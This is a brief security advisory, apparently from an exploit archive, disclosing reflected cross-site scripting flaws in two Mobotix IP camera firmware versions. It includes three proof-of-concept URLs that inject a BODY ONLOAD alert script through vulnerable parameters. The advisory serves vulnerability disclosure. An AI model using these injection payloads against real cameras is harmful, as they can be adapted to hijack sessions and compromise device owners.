Mobotix IP Network Cameras suffer from multiple cross site scripting flaws. M10 version 2.0.5.2 and M1 version 1.9.4.7 are affected.
4cb8a42bae57c9821b121d9e4fffd82812f0a361d2b80bfac2bf0cc4ff91b998
Mobotix IP Network Cameras Multiple XSS
Version: Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7
Discovered by: jaime.blasco(at)eazel(dot).es
https://www.eazel.es
Description:
Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.
Due to improper filtering a remote attacker can cause a cross site scripting in these scripts:
https://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
https://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal
https://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
The advisorie can be found at : https://www.eazel.es/media/advisory001.html